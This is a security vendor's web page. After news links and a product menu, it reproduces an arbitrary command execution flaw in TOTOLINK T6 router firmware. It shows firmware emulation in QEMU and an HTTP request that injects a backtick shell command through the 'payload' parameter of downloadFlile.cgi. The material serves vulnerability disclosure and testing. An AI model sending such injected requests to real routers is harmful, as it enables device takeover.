美创科技打造县域医疗灾备新标杆|神木市医院 HIS 系统数据库分钟级切换演练实录
2025-07-02
百万罚单警示!DCAS助力金融机构筑牢数据安全防线,实现监管合规
2025-06-20
2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布
2025-02-07
美创用户专访 | 精细化管理:医疗行业数据分类分级的策略与实践
2025-01-10
容灾演练双月报|美创助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练
2025-01-10
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API审计 API防控 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务TOTOLINK是一款无线路由品牌,TOTOLINK T6_Firmware V5.9c.4085_B20190428存在一个任意命令执行漏洞。
TOTOLINK T6_Firmware V5.9c.4085_B20190428
访问
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.h
下载T6_Firmware V5.9c.4085_B20190428固件
固件下载成功后,执行
binwalk -Me TOTOLINK_C818NR_T6_IP04338_8197FN_SPI_16M128M_V5.9c.4085_B20190428_ALL.web --run-as=root
提取文件系统
进入提取的文件系统目录
执行
mkdir var/run && touch /var/run/lighttpd.pid
创建路由器启动环境所需的pid
执行
给路由器web服务创建一个虚拟网络环境
执行
wget https://people.debian.org/\~aurel32/qemu/mipsel/debian_wheezy_mipsel_standard.qcow2 && wget https://people.debian.org/\~aurel32/qemu/mipsel/vmlinux-3.2.0-4-4kc-malta
下载镜像和虚拟磁盘环境,为搭建路由器web作前置准备
镜像和虚拟磁盘下载完毕后,执行
qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic
启动虚拟环境,虚拟环境启动后账号密码为root/root
登录虚拟环境后,执行
ifconfig eth0 192.168.6.10
配置虚拟环境网络
返回原始机器环境,执行
scp -r squashfs-root/ root@192.168.6.10:/root/
将文件系统拷贝至虚拟环境中
在虚拟环境中执行
启动路由器web服务
在原始机器环境中通过浏览器访问
http://192.168.6.15/login.asp
出现如图所示页面代表环境搭建成功
该漏洞触发点位于
/cgi-bin/downloadFlile.cgi
构造如下数据包并请求
执行pwd命令并将命令结果写入../pwd.txt
GET /cgi-bin/downloadFlile.cgi?payload=`pwd>../pwd.txt` HTTP/1.1
Host: 192.168.6.10
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
浏览器访问
如图所示,页面显示pwd命令结果